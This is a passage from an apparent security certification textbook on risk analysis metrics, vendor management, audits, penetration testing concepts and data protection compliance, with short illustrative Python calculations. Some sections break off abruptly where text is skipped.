• Annualized Loss Expectancy (ALE)—The amount that would be lost over the
course of a year. This is determined by multiplying the SLE by the annualized
rate of occurrence (ARO). ARO describes the number of times in a year that an
event occurs. In our previous (highly simplified) example, if it is anticipated that
a tornado weather event will cause an impact twice per year, then the ARO is
considered to be simply “2.” The ALE is the cost of the event (SLE) multiplied by the number of times in a year it occurs (the ARO). In the tornado example, SLE is $80,000 and ARO is 2, so the ALE is $160,000. This number is useful when considering
different ways to protect the building from tornados. If it is known that tornados
will have a $160,000 per year average cost, then this number can be used as a
comparison when considering the cost of various protections.
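The SLE and ALE formulas above can be sketched as a short calculation; the figures below are the tornado example's from the text, not general values:

```python
def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = asset value x exposure factor (the fraction of the asset lost)."""
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x annualized rate of occurrence (events per year)."""
    return sle * aro

# Tornado example from the text: $200,000 building, 40% exposure, 2 events/year.
sle = single_loss_expectancy(200_000, 0.4)   # $80,000
ale = annualized_loss_expectancy(sle, 2)     # $160,000
print(sle, ale)
```

The ALE figure can then be compared directly against the annual cost of candidate controls.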
It is important to realize that the value of an asset does not refer solely to its
material value. The two principal additional considerations are direct costs
associated with the asset being compromised (downtime) and consequent costs
to intangible assets, such as the company’s reputation. For example, a server
may have a material cost of a few hundred dollars. If the server were stolen, the
costs incurred from not being able to do business until it can be recovered or
replaced could run to thousands of dollars. In addition, the period of interruption
during which orders cannot be taken or go unfulfilled may lead customers to seek
alternative suppliers, potentially resulting in the loss of thousands of sales and
goodwill.
The value of quantitative analysis is its ability to develop tangible numbers that
reflect real money. Quantitative analysis helps to justify the costs of various
controls. When analysts can associate cost savings with a control, it is easy to justify
its expense. For example, it is easy to justify the money spent on a load balancer
to eliminate losses from website downtime that exceeded the cost of the load
balancer. Unfortunately, such direct and clear associations are uncommon!
The problem with quantitative risk assessment is that the process of determining
and assigning these values is complex and time consuming. The accuracy of the
values assigned is also difficult to determine without historical data (often, it has to
be based on subjective guesswork). However, over time and with experience, this
approach can yield a detailed and sophisticated description of assets and risks and
provide a sound basis for justifying and prioritizing security expenditure.
Qualitative Analysis
Qualitative risk analysis is a method used in risk management to assess risks
based on subjective judgment and qualitative factors rather than precise numerical
data. Qualitative risk analysis aims to provide a qualitative understanding of risks,
their potential impact, and the likelihood of their occurrence. Often referred to as
risk analysis using words, not numbers, this approach helps identify and prioritize
intangible risks.
One of the benefits of qualitative risk analysis is its simplicity and ease of use. It
does not require complex mathematical calculations or extensive data collection,
making it a more accessible approach. It allows for a quick initial assessment of
risks, enabling organizations to identify and focus on the most significant issues.
Qualitative risk analysis frames risks by considering their causes, consequences,
and potential interdependencies to improve risk communication and
decision-making.
Qualitative risk analysis has some limitations. It is subjective in nature and heavily
relies on expert judgment, which often introduces biases and inconsistencies if
expert opinions differ. The lack of numerical data in qualitative risk analysis may
make communicating risks to stakeholders who prefer quantitative information
challenging. Despite these limitations, qualitative risk analysis is important because
it provides a simplified description of risks and can help quickly draw attention to
significant issues.
Inherent Risk
The result of a quantitative or qualitative analysis is a measure of inherent risk.
Inherent risk is the level of risk before any type of mitigation has been attempted.
In theory, security controls or countermeasures could be introduced to address
every risk factor. The difficulty is that security controls can be expensive, so it is
important to balance the cost of the control with the cost associated with the risk.
It is not possible to eliminate risk; rather the aim is to mitigate risk factors to the
point where the organization is exposed only to a level of risk that it can tolerate.
The overall status of risk management is referred to as risk posture. Risk posture informs how risk response options are identified and prioritized. For example,
an organization might identify the following priorities:
• Regulatory requirements to deploy security controls and make demonstrable
efforts to reduce risk. Examples of legislation and regulation that mandate risk
controls include SOX, HIPAA, Gramm-Leach-Bliley, the Homeland Security Act,
PCI DSS regulations, and various personal data protection measures.
Heat Map
Another simple approach is the heat map or “traffic light” impact matrix. For
each risk, a simple red, yellow, or green indicator can be put into each column to
represent the severity of the risk, its likelihood, cost of controls, and so on. This
approach is simplistic but does give an immediate impression of where efforts
should be concentrated to improve security.
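One minimal way to sketch such a traffic-light matrix, assuming likelihood and impact are each scored 1–5 (the band thresholds below are illustrative choices, not a standard):

```python
def heat_map_color(likelihood: int, impact: int) -> str:
    """Map a 1-5 likelihood x 1-5 impact score to a traffic-light indicator.
    The band thresholds are arbitrary illustrative choices."""
    score = likelihood * impact          # 1..25
    if score >= 15:
        return "red"
    if score >= 6:
        return "yellow"
    return "green"

print(heat_map_color(5, 4))  # high likelihood, high impact -> "red"
print(heat_map_color(1, 2))  # -> "green"
```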
Risk Transference
Transference (or sharing) means assigning risk to a third party, such as an
insurance company. Specific cybersecurity insurance or cyber liability coverage
protects against fines and liabilities arising from data breaches and attacks.
Note that in this sort of case it is relatively simple to transfer the obvious risks, but
risks to the company’s reputation remain. If a customer’s credit card details are stolen
because they used your insecure e-commerce application, the customer won't care if
you or a third party were nominally responsible for security. It is also unlikely that legal
liabilities could be completely transferred in this way. For example, insurance terms are
likely to require that best practice risk controls have been implemented.
Risk Acceptance
Risk acceptance (or tolerance) means that no countermeasures are put in place
because the level of risk does not justify it.
A risk exception describes a situation where a risk cannot be mitigated using
standard risk management practices or within a specified time frame due to
financial, technical, or operational conditions. A risk exception formally recognizes
the risk and seeks to identify alternate mitigating controls, if possible. Relevant
stakeholders, such as risk managers or senior executives, must approve all risk
exceptions. Risk exceptions should be temporary and reviewed on an established
time frame to determine whether the risk levels have changed or if the exception
can be removed.
A risk exemption is a condition where risk can remain without mitigation, usually
due to a strategic business decision. Risk exemptions are generally associated with
situations where the cost of mitigating a risk outweighs its potential harm or can
lead to significant strategic benefits when accepted. Similarly to risk exceptions,
risk exemptions must be formally documented and approved by risk managers or
senior executives and periodically reviewed using an established timetable.
The four risk responses are avoid, accept, mitigate, and transfer.
For each business process and each threat, you must assess the degree of risk that
exists. Calculating risk is complex, but the two main variables are likelihood and
impact:
• Likelihood is often used in qualitative analysis to subjectively describe the chance of a risk event happening. Likelihood is typically expressed using “low,” “medium,” and “high” or scored on a scale from 1 to 5.
• Impact is the severity of the risk if realized as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if
the asset is compromised.
Risk Registers
A risk register is a document showing the results of risk assessments in a
comprehensible format and includes information regarding risks, their severity, the
associated owner of the risk, and all identified mitigation strategies. The register
may include a heat map risk matrix (shown earlier) with columns for impact and
likelihood ratings, date of identification, description, countermeasures, owner/route
for escalation, and status.
Risk registers are also commonly depicted as scatterplot graphs, where impact
and likelihood are each an axis, and the plot point is associated with a legend that
includes more information about the nature of the plotted risk. A risk register
should be shared among stakeholders (executives, department managers, and
senior technicians) so that they understand the risks associated with the workflows
that they manage.
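The register columns described above can be sketched as a simple record structure (the field names and scoring scale below are illustrative assumptions):

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class RiskRegisterEntry:
    """One row of a risk register; fields mirror the columns described above."""
    description: str
    impact: int          # e.g., 1 (low) to 5 (high)
    likelihood: int      # e.g., 1 (low) to 5 (high)
    identified: date     # date of identification
    countermeasures: str
    owner: str           # owner / route for escalation
    status: str          # e.g., "open", "mitigating", "closed"

# Hypothetical example entry.
entry = RiskRegisterEntry(
    description="Unpatched web server exposed to the Internet",
    impact=4, likelihood=3,
    identified=date(2024, 1, 15),
    countermeasures="Apply vendor patches; restrict inbound access",
    owner="IT Operations Manager",
    status="open",
)
print(entry.owner)
```

A collection of such entries could be sorted by impact × likelihood to produce the scatterplot or heat map views mentioned above.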
Risk Threshold
Risk threshold defines the limits or levels of acceptable risk an organization is
willing to tolerate. The risk threshold represents the boundaries within which
risks are considered to be acceptable and manageable. Risk thresholds are based
on various factors such as regulatory requirements, organizational objectives,
stakeholder expectations, and the organization’s risk appetite to help establish
clear guidelines for decision-making. Organizations often define different risk
thresholds for different types of risks based on their potential impact and
criticality.
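A risk threshold can be sketched as a simple acceptance check against a scored risk; the threshold values and risk-type names below are illustrative assumptions:

```python
def within_threshold(risk_score: int, threshold: int) -> bool:
    """Return True if a scored risk falls within the acceptable boundary."""
    return risk_score <= threshold

# Illustrative: different thresholds for different risk types.
thresholds = {"financial": 8, "operational": 12, "reputational": 6}
print(within_threshold(10, thresholds["operational"]))  # True: acceptable
print(within_threshold(10, thresholds["financial"]))    # False: needs a response
```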
Risk Reporting
Risk reporting describes the methods used to communicate an organization’s
risk profile and the effectiveness of its risk management program. Effective risk
reporting supports decision-making, highlights concerns, and ensures stakeholders
understand the organization’s risks. The content of risk reports must be relevant
to its intended audience. For example, reports designed for board members must
focus on strategic risks and the organization’s overall risk appetite. Operational risk
reports must include specific details regarding the factors contributing to risk and
are appropriate for managers or technical employees. Risk reports must also clearly
convey recommended risk responses, such as accepting, mitigating, transferring, or
avoiding the risk.
Functions that act as support for the business or an MEF, but are not critical in
themselves, are referred to as primary business functions (PBF).
• Recovery point objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an
RPO of 24 hours means that the data can be recovered (from a backup copy)
to a point not more than 24 hours before the database was infected. RPO is
determined by identifying the maximum acceptable data loss an organization
can tolerate in the event of a disaster or system failure and is established
by considering factors such as business requirements, data criticality, and
regulatory or contractual obligations. The calculation of RPO directly impacts
the frequency of data backups, data replication requirements, recovery site
selection, and technologies that support failover and high availability.
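The relationship between RPO and backup age can be sketched as a simple check: a recovery point exists within the RPO window only if the most recent backup is no older than the RPO. This is a minimal illustration, not a backup tool:

```python
from datetime import datetime, timedelta

def meets_rpo(last_backup: datetime, now: datetime, rpo: timedelta) -> bool:
    """True if the most recent backup is no older than the RPO,
    i.e., a restore would lose no more data than the RPO allows."""
    return (now - last_backup) <= rpo

now = datetime(2024, 6, 1, 12, 0)
rpo = timedelta(hours=24)
print(meets_rpo(datetime(2024, 5, 31, 18, 0), now, rpo))  # True: backup is 18h old
print(meets_rpo(datetime(2024, 5, 30, 6, 0), now, rpo))   # False: backup is 30h old
```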
Mean time to repair (MTTR) and mean time between failures (MTBF) are key
performance indicators (KPIs) used to measure the reliability and efficiency
of systems, processes, and equipment. Both metrics are important to risk
management processes, providing measurable insights into potential risks and
supporting risk mitigation strategies. MTTR and MTBF guide decisions regarding
system design, maintenance practices, and redundancy or failover requirements.
• Mean time between failures (MTBF) represents the expected lifetime of a
product. The calculation for MTBF is the total operational time divided by the
number of failures. For example, if you have 10 appliances that run for 50 hours and two of them fail, the MTBF is (10 × 50) / 2 = 250 hours per failure.
• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to replace or recover. MTTR is calculated as the total number of hours
of unplanned maintenance divided by the number of failure incidents. This
average value can be used to estimate whether a recovery time objective (RTO) is
achievable.
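The MTBF and MTTR calculations above can be sketched as follows; the MTBF figures are the appliance example from the text, while the MTTR figures are an illustrative assumption:

```python
def mtbf(total_operational_hours: float, failures: int) -> float:
    """MTBF = total operational time / number of failures."""
    return total_operational_hours / failures

def mttr(unplanned_maintenance_hours: float, failures: int) -> float:
    """MTTR = total unplanned maintenance time / number of failure incidents."""
    return unplanned_maintenance_hours / failures

# Text example: 10 appliances x 50 hours each, 2 failures.
print(mtbf(10 * 50, 2))  # 250.0 hours per failure
# Illustrative MTTR: 12 hours of unplanned maintenance across 3 incidents.
print(mttr(12, 3))       # 4.0 hours
```

An MTTR averaged this way can be compared against the RTO to judge whether recovery targets are realistic.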
Review Activity:
Risk Management Processes
and Concepts
Topic 15B
Vendor Management Concepts
Vendor Selection
Vendor selection practices must systematically evaluate and assess potential
vendors to minimize risks associated with outsourcing or procurement. It typically
includes several steps, such as identifying risk criteria, conducting due diligence,
and selecting vendors based on their risk profile. Risk management practices aim
to identify and mitigate risks related to financial stability, operational reliability,
data security, regulatory compliance, and reputation. The goal is to select vendors
who align with the organization’s risk tolerance and demonstrate the capability to
manage risks effectively.
Conflict of Interest
A conflict of interest arises when an individual or organization has competing
interests or obligations that could compromise their ability to act objectively,
impartially, or in the best interest of another party. When performing vendor
assessments, it is vital to determine whether a vendor’s interests, relationships, or
affiliations may influence their ability to provide unbiased recommendations, fair pricing, or impartial service delivery. Organizations must diligently identify and
address potential conflicts of interest, including scrutinizing the vendor’s affiliations,
relationships with competitors or stakeholders, financial interests, and any potential
bias that could compromise their integrity. Some examples of conflict of interest
include the following items:
• Financial Interests—A vendor may have a financial interest in recommending
specific products or services due to partnerships, commissions, or financial
incentives that bias their recommendations and lead to selecting options that
may not fit the organization’s needs.
Performing vendor site visits offers firsthand observation and assessment of a vendor's
physical facilities, operational processes, and overall risk management practices,
allowing for a more comprehensive evaluation of potential risks and vulnerabilities.
Vendor Monitoring
Vendor monitoring involves continuously overseeing and evaluating vendors to
ensure ongoing adherence to security standards, compliance requirements, and
contractual obligations. It may include regular performance reviews, periodic
assessments, and real-time monitoring of vendor activities. This proactive
approach allows organizations to promptly identify and address potential risks or
issues.
Legal Agreements
Legal agreements play a vital role in supporting vendor relationships by establishing
both parties’ rights, responsibilities, and expectations. Legal agreements serve
as the foundation for the vendor-client relationship, providing a framework for
conducting business and addressing potential issues or disputes that may arise.
Initial Agreements
Different types of agreements are needed to govern vendor relationships based
on the specific nature of the engagement and the services being provided. The
following agreements play distinct roles in setting up vendor relationships:
• Memorandum of Understanding (MOU)—a nonbinding agreement that
outlines the intentions, shared goals, and general terms of cooperation between
parties. MOUs serve as a preliminary step to establish a common understanding
before proceeding with a more formal agreement.
Detailed Agreements
Where initial agreements establish a framework for collaboration or service
provision, other agreements can be implemented to specify terms for operational
detail. These help to govern vendor relationships effectively.
• Service-level Agreement (SLA)—defines the specific performance metrics,
quality standards, and service levels expected from the vendor.
Questionnaires
Questionnaires gather vendor information about their security practices, controls,
and risk management strategies to help organizations assess a vendor’s security
posture, identify vulnerabilities, and evaluate their capabilities. Questionnaires
provide a structured means of obtaining vendor information, enabling risk analysis and comparison to be performed fairly and consistently. Questionnaires
collect information about the vendor’s security policies, procedures, and controls,
including data protection, access management, incident response, and disaster
recovery. The questionnaire may ask about a vendor’s compliance with industry-
specific regulations and standards, such as GDPR, HIPAA, ISO 27001, or PCI-DSS.
It may also seek details about the vendor’s security training and awareness
programs for employees and their approach to conducting third-party security
assessments and audits. Additionally, the questionnaire may explore the vendor’s
incident response capabilities, breach history, and insurance coverage.
Rules of Engagement
Rules of Engagement (RoE) define the parameters and expectations for vendor
relationships. These rules outline the responsibilities, communication methods,
reporting mechanisms, security requirements, and compliance obligations that
vendors must adhere to. Rules of engagement establish clear guidelines for the
vendor’s behavior, activities, and access to sensitive information. By setting these
boundaries, organizations can establish a controlled and secure environment,
mitigating the potential risks associated with third-party relationships. Some
important elements included in an RoE include the following:
• Roles and Responsibilities—Clearly define the roles and responsibilities of the
vendor and client in managing risks, including specifying who is responsible for
identifying, assessing, and mitigating various types of risks.
Review Activity:
Vendor Management Concepts
Topic 15C
Audits and Assessments
Internal Assessments
• Compliance Assessment—Internal compliance assessments ensure operating practices align with laws, regulations, standards, policies, and ethical requirements. These assessments evaluate the effectiveness of internal controls, identify noncompliance or risk areas, and communicate findings to stakeholders such as risk managers.
• Audit Committee—Audit committees provide independent oversight and assurance regarding an organization’s financial reporting, internal controls, and risk management practices. These committees are typically composed of board members independent of the organization’s management team. Audit committees aim to enhance the integrity of financial statements, ensure compliance with legal and regulatory requirements, monitor the effectiveness of internal controls, oversee the external audit process, and promote transparency and accountability. Audit committees are critical in fostering confidence among shareholders, stakeholders, and the public by providing an independent and objective assessment of the organization’s financial practices and contributing to sound corporate governance.
• Self-Assessment—Self-assessments allow individuals or organizations to evaluate their performance, practices, and adherence to established criteria against predetermined metrics and measures. Self-assessments help identify strengths, weaknesses, and areas for improvement, enabling individuals or organizations to take proactive measures to enhance their effectiveness and outcomes. Self-assessments assume that internal personnel with the expertise, knowledge, and understanding of the assessed area are available to complete them.
Internal assessments are required for government agencies according to the NIST RMF,
PCI-DSS, and others.
External Assessments
• Regulatory—Regulatory authorities or agencies perform assessments to ensure compliance with specific laws, regulations, or industry standards. Regulatory assessments evaluate whether organizations adhere to mandatory regulatory requirements and promote a culture of compliance. Regulatory assessments typically involve inspections, audits, or reviews of processes, practices, and controls to verify compliance, identify deficiencies, and enforce regulatory obligations. Regulatory assessments play a critical role in safeguarding public interests, protecting consumers, maintaining market integrity, and upholding industry standards. They help mitigate risks, ensure fair competition, and enhance transparency and accountability in regulated industries.
• Examination—An external examination typically refers to an independent and formal evaluation conducted by external parties, such as auditors or regulators, to assess the accuracy, reliability, and compliance of an organization’s financial statements, processes, controls, or specific aspects of its operations. External examinations focus on verifying information accuracy and ensuring compliance with applicable laws, regulations, or industry standards. Examples of external examinations include financial statement audits, regulatory compliance audits, and specific assessments of control environments.
• Assessment—An external assessment generally refers to a broad evaluation conducted by external experts or consultants to assess an organization’s overall performance, practices, capabilities, or specific focus areas. External assessments can encompass various elements, such as strategy, operational efficiency, risk management, cybersecurity, or compliance practices. The goal is to provide an objective and independent perspective on the organization’s strengths, weaknesses, and opportunities for improvement.
• Independent Third-Party Audit—Independent third-party audits provide objective and unbiased assessments of an organization’s systems, controls, processes, and compliance. The importance of independent third-party audits lies in their ability to offer an external perspective, free from any conflicts of interest or bias. Independent audits instill confidence among stakeholders, including customers, business partners, regulatory bodies, and investors, as they attest to an organization’s commitment to quality, compliance, and good governance. They also help organizations demonstrate transparency, accountability, and adherence to industry standards and regulations.
External entities could include certified public accountants (CPAs), external auditors,
consulting firms, regulatory bodies, or specialized assessment agencies. The
independence of these external assessors ensures impartiality and objectivity in the
evaluation process.
Penetration Testing
A penetration test—often shortened to pen test—uses authorized hacking
techniques to discover exploitable weaknesses in the target’s security systems.
Pen testing is also referred to as ethical hacking. A pen test might involve the
following steps:
• Verify a Threat Exists—use surveillance, social engineering, network scanners,
and vulnerability assessment tools to identify a vector by which vulnerabilities
could be exploited.
• Bypass Security Controls—look for easy ways to attack the system. For
example, if the network is strongly protected by a firewall, is it possible to gain
physical access to a computer in the building and run malware from a USB stick?
Exercise Types
Penetration testing is a crucial component of cybersecurity assessments
that involves simulating real-world attacks on computer systems, networks,
or applications to identify vulnerabilities and weaknesses. Different types of
penetration tests exist to address specific objectives related to a security evaluation,
such as testing specific systems, assessing incident response capabilities, measuring
the effectiveness of physical controls, and many other areas. Different types of
penetration tests allow organizations to use a flexible and prioritized approach
toward security assessment.
Review Activity:
Penetration Testing Concepts
Lesson 15
Summary
You should be able to explain risk management, business impact analysis, and
disaster recovery planning processes and metrics.
• Create a risk register to help manage and track risks including the staff assigned
to address them.
• Identify and analyze the vendors included in the supply chain and ensure they
have adequate security operations.
LESSON INTRODUCTION
Data protection and compliance encompass a range of practices and principles
aimed at safeguarding sensitive information, ensuring privacy, and adhering to
applicable laws and regulations. Data protection involves implementing measures
to secure data against unauthorized access, loss, or misuse. It includes practices
such as encryption, access controls, data backup, and secure storage. Compliance
refers to conforming to legal, regulatory, and industry requirements relevant to
data handling, privacy, security, and transparency. Organizations can safeguard
individuals’ privacy, ensure data security, fulfill legal requirements, and establish
credibility with customers, partners, and regulatory authorities by comprehending
and implementing these data protection and compliance principles. Compliance
with applicable data protection laws, regulations, and standards is crucial for
organizations to avoid legal liabilities, reputational damage, and financial penalties
associated with noncompliance.
Lesson Objectives
In this lesson, you will do the following:
• Explain privacy and data sensitivity concepts.
Topic 16A
Data Classification and Compliance
Data Types
The concept of data types refers to categorizing or classifying data based on its
inherent characteristics, structure, and intended use. Data types provide a way
to organize and understand the different data forms within a system or dataset.
Classifying data into specific types makes analyzing, processing, interpreting, and
securing information easier.
Regulated Data
Regulated data refers to specific categories of information subject to legal
or regulatory requirements regarding their handling, storage, and protection.
Regulated data typically includes sensitive or personally identifiable information
(PII) protected by laws and regulations to ensure privacy, security, and appropriate
use. The types of regulated data vary depending on jurisdiction and the specific
regulations applicable to the organization or data. Common examples of regulated
data include financial information, healthcare records, social security numbers,
credit card details, and other personally identifiable information. Privacy laws and
industry-specific regulations often protect these data types, such as the Health
Insurance Portability and Accountability Act (HIPAA) for healthcare data or the
Payment Card Industry Data Security Standard (PCI DSS) for credit card information.
Organizations that handle regulated data must comply with relevant laws and
regulations governing its protection. Compliance typically involves implementing
appropriate security measures, data encryption, access controls, data breach
notification procedures, and data handling protocols. Organizations may also need
to establish data storage, retention, and destruction safeguards to meet regulatory
requirements.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
Trade Secrets
Trade secret data refers to valuable, confidential information that gives a business
a competitive advantage. Trade secrets encompass a wide range of nonpublic, proprietary
information, including formulas, processes, methods, techniques, customer lists,
pricing information, marketing strategies, and other business-critical data. Trade
secrets have commercial value derived from their secrecy. Businesses often require
employees and contractors to sign non-disclosure agreements (NDAs) to safeguard
the confidentiality of trade secrets. Disclosure or unauthorized use of trade secret
data is a serious legal matter. Companies can take legal action against individuals or
organizations unlawfully acquiring, using, or disclosing trade secrets. Laws related
to trade secrets vary across jurisdictions, but they generally aim to prevent unfair
competition and provide remedies for misappropriation.
Data Classifications
Data classification and typing schemas tag data assets so that they can be
managed through the information lifecycle. A data classification schema is a
decision tree for applying one or more tags or labels to each data asset. Many data
classification schemas are based on the degree of confidentiality required:
• Public (unclassified)—there are no restrictions on viewing the data. Public
information presents no risk to an organization if it is disclosed but does present
a risk if it is modified or not available.
• Critical (top secret)—the information is too valuable to allow any risk of its
capture. Viewing is severely restricted.
Using Microsoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from Microsoft.)
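A classification schema's decision tree can be sketched as a simple labeling function. The public and critical labels follow the levels listed above; the decision questions and the intermediate "confidential" level are illustrative assumptions, not part of the schema described here:

```python
def classify(contains_pii: bool, restricted_viewing: bool) -> str:
    """Apply a confidentiality label via simple decision-tree questions.
    The questions and the intermediate label are illustrative assumptions."""
    if restricted_viewing:
        return "critical"       # top secret: viewing severely restricted
    if contains_pii:
        return "confidential"   # assumed intermediate level
    return "public"             # unclassified: no viewing restrictions

print(classify(contains_pii=False, restricted_viewing=False))  # "public"
print(classify(contains_pii=True, restricted_viewing=False))   # "confidential"
```

In practice, tools such as the labeling policy shown in the screenshot apply tags like these automatically based on content-matching rules.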
Data Sovereignty
Data sovereignty refers to a jurisdiction preventing or restricting processing and
storage from taking place on systems that do not physically reside within that
jurisdiction. Data sovereignty may demand certain concessions on your part, such
as using location-specific storage facilities in a cloud service.
For example, GDPR protections extend to any data subject located within EU
or EEA (European Economic Area) borders, regardless of citizenship. Data subjects can consent to allow a
transfer but there must be a meaningful option for them to refuse consent. If the
transfer destination jurisdiction does not provide adequate privacy regulations (to
a level comparable to GDPR), then contractual safeguards must be given to extend
GDPR rights to the data subject. In the United States, companies could previously
self-certify that the protections they offered were adequate under the Privacy
Shield scheme (privacyshield.gov/US-Businesses); Privacy Shield was invalidated by
the Court of Justice of the EU in 2020, and transatlantic transfers now rely on
mechanisms such as standard contractual clauses and the EU-U.S. Data Privacy
Framework.
Geographical Considerations
Geographic access requirements fall into two different scenarios:
• Storage locations might have to be carefully selected to mitigate data sovereignty
issues. Most cloud providers allow a choice of datacenters for processing and
storage, ensuring that information is not illegally transferred from a particular
privacy jurisdiction without consent.
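A data sovereignty constraint is often implemented by pinning storage to an approved set of regions. The following sketch uses hypothetical jurisdiction and region names (the mapping is an illustrative assumption, not a real provider's policy):

```python
# Sketch: block storage placement that would move data outside its
# required jurisdiction. Region identifiers are illustrative.

ALLOWED_REGIONS = {
    "EU": {"eu-west-1", "eu-central-1"},   # EU/EEA personal data stays in EU
    "US": {"us-east-1", "us-west-2"},
}

def check_placement(jurisdiction: str, region: str) -> bool:
    """Return True only if the region satisfies the jurisdiction rule."""
    return region in ALLOWED_REGIONS.get(jurisdiction, set())

assert check_placement("EU", "eu-central-1")
assert not check_placement("EU", "us-east-1")   # transfer would be blocked
```

Cloud providers expose equivalent controls as datacenter/region selection and organization-wide location policies.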
Privacy Data
Privacy data refers to personally identifiable or sensitive information associated
with an individual’s personal, financial, or social identity, including data that, if
exposed or mishandled, could infringe upon an individual’s privacy rights. Examples
of privacy data include names, addresses, contact information, social security
numbers, medical records, financial transactions, and, generally, any other data
that can be used to identify a specific person. Privacy data and confidential data
have certain similarities. Both types of data require protection due to their sensitive
nature. Unauthorized access, disclosure, or misuse of privacy or confidential data
can negatively affect individuals or organizations.
Additionally, both privacy data and confidential data are subject to legal and ethical
considerations. Organizations must comply with relevant laws and regulations, such
as data protection and privacy laws, to safeguard both data types. However, there
are also notable differences between privacy data and confidential data.
Confidential data encompasses any information that requires protection due to
its confidential nature, regardless of whether it pertains to an individual. Examples
include trade secrets, intellectual property, financial statements, proprietary
algorithms, source code, and other nonpublic information. Privacy data, on
the other hand, specifically refers to information that can identify or impact an
individual’s privacy. Confidential data is primarily concerned with safeguarding
information from unauthorized access, use, or disclosure to maintain business
competitiveness, protect intellectual property, or preserve the integrity of sensitive
company data.
Privacy data focuses on protecting personal information to preserve an individual’s
privacy rights, prevent identity theft, and maintain the confidentiality of personal
details. Privacy data is closely associated with the rights of individuals to control
the use and disclosure of their personal information. Individuals have the right
to access, correct, and request the deletion of their privacy data. In contrast,
confidential data typically does not grant specific rights to the data subjects, as
it relates more to organizations’ proprietary information. The handling of privacy
data often requires explicit consent from the data subject for its collection, use,
and disclosure, particularly in compliance with privacy laws and regulations. On
the other hand, confidential data, while protected, may not necessarily require
individual consent for its handling, as it is associated with internal or business-
related information.
Privacy and confidential data share similarities in sensitivity and legal
considerations. However, scope, focus, data subject rights, and consent
requirements differ. While both types of data require careful handling and
protection, privacy data pertains explicitly to personal information and individual
privacy rights.
Legal Implications
Protecting privacy data carries significant local, national, and global legal
implications. Many countries have specific privacy laws and regulations that dictate
how personal data should be handled within their jurisdiction. These laws define
the rights of individuals, the responsibilities of organizations, and the procedures
for data protection and privacy enforcement. At the national level, data protection
authorities or supervisory bodies enforce privacy laws and oversee compliance.
They have the authority to investigate data breaches, issue fines, and take legal
action against organizations that fail to protect privacy data or violate individuals’
privacy rights. The General Data Protection Regulation (GDPR) in the European
Union has had a substantial impact globally by setting high privacy and data
protection standards. GDPR applies to organizations that process the personal
data of EU residents, regardless of their physical location. This extraterritorial
effect ensures that organizations worldwide adhere to GDPR principles when
handling EU citizens’ personal data. Cross-border data transfers are also subject
to specific requirements and restrictions. For example, the GDPR restricts
transferring personal data outside the European Economic Area unless adequate
safeguards exist to protect privacy data. Understanding and adhering to these
legal requirements are essential to avoid legal consequences, maintain trust with
individuals, and foster a global culture of privacy and data protection.
Privacy Act (CCPA). One of the rights afforded to data subjects is the right of access,
meaning that data subjects have the right to request access to their personal data
and obtain information about how it is being processed. Subjects can inquire about
the purposes of processing, the categories of data being processed, recipients
of the data, and the duration of data retention. Data subjects have the right to
rectification, which means that if data subjects discover that the personal data
held by an organization is inaccurate or incomplete, they have the right to request
its correction to ensure that their personal data is up to date and accurate. Data
subjects also have the right to request the erasure or removal of their personal data
under certain circumstances.
For example, if the data is no longer necessary for the purposes it was collected,
or if the data subject withdraws their consent for its processing, they can request
its deletion. Data subjects can request the restriction of processing their personal
data. The implications are that while privacy data can still be stored, it cannot be
processed further except under specific conditions. This right gives data subjects
control over their personal data’s ongoing use. Data portability is another right
granted to data subjects. Subjects have the right to receive their personal data in
a commonly used and machine-readable format, ensuring their ability to move
and transfer their personal information as desired. Data subjects have the right
to object to processing their personal data based on specific grounds. Examples
include if a subject believes their data is being processed for purposes that are not
legitimate or if they wish to object to direct marketing activities. Lastly, data subjects
have the right to withdraw their consent for the processing of their personal data.
If the processing is based on their consent, they can revoke it at any time, and the
organization must cease processing the data accordingly.
Data subjects exercise these rights by contacting the Data Controller, who ensures
that data subject rights are respected, facilitates the exercise of these rights, and
addresses any concerns or requests from data subjects.
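The rights described above map naturally onto operations a controller must support. This is a minimal sketch with a hypothetical in-memory store; a real controller would add authentication, audit logging, and propagation to processors:

```python
import json

# Sketch of a data controller servicing data subject rights requests
# (access, rectification, erasure, restriction, portability).

class DataController:
    def __init__(self):
        self.records = {}        # subject_id -> personal data
        self.restricted = set()  # subjects whose processing is restricted

    def access(self, subject_id):            # right of access
        return self.records.get(subject_id)

    def rectify(self, subject_id, field, value):  # right to rectification
        self.records[subject_id][field] = value

    def erase(self, subject_id):             # right to erasure
        self.records.pop(subject_id, None)
        self.restricted.discard(subject_id)

    def restrict(self, subject_id):          # restriction of processing
        self.restricted.add(subject_id)

    def export(self, subject_id):            # data portability
        return json.dumps(self.records.get(subject_id, {}))
```

The restriction flag illustrates that restricted data may still be stored but must not be processed further without a qualifying condition.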
Right to Be Forgotten
The “right to be forgotten” is a fundamental principle outlined in the General Data
Protection Regulation (GDPR) that grants data subjects the right to request the
erasure or deletion of their personal data under certain circumstances. It empowers
individuals to have their personal information removed from online platforms,
databases, or any other sources where their data is being processed and made
publicly available.
The right to be forgotten recognizes the importance of individual privacy and
control over personal data. Upon receiving a valid erasure request, the Data
Controller must erase the personal data promptly unless there are legitimate
grounds for refusing the request. This right extends to the removal of data from
the organization’s systems and to any third parties with whom the data has been
shared or made publicly available. This right may be limited if the processing of
personal data is necessary for exercising the right of freedom of expression and
information, compliance with a legal obligation, or the establishment, exercise,
or defense of legal claims. The right to be forgotten serves as a mechanism for
individuals to regain control over their personal information. It promotes privacy
and data protection by enabling subjects to remove personal data when it is no
longer necessary or lawful to retain it.
placed on the rights and protections of the data subject rather than determining
ownership. The data subject has control over their personal data and can exercise
certain rights, such as the right to access, rectify, and delete their data.
However, organizations that collect and process personal data are considered
custodians or stewards of the data rather than owners. They have legal and
ethical responsibilities to handle personal data securely and lawfully and to
respect the rights of the data subjects. It is important to note that privacy data
often consists of information about individuals, and those individuals have a
strong interest in protecting their personal information. Data protection laws
aim to provide individuals with control and protection over their personal data,
ensuring transparency, consent, and fair processing practices. While the concept
of ownership might not directly apply to privacy data, individuals have rights and
control over their personal information, and organizations are legally accountable
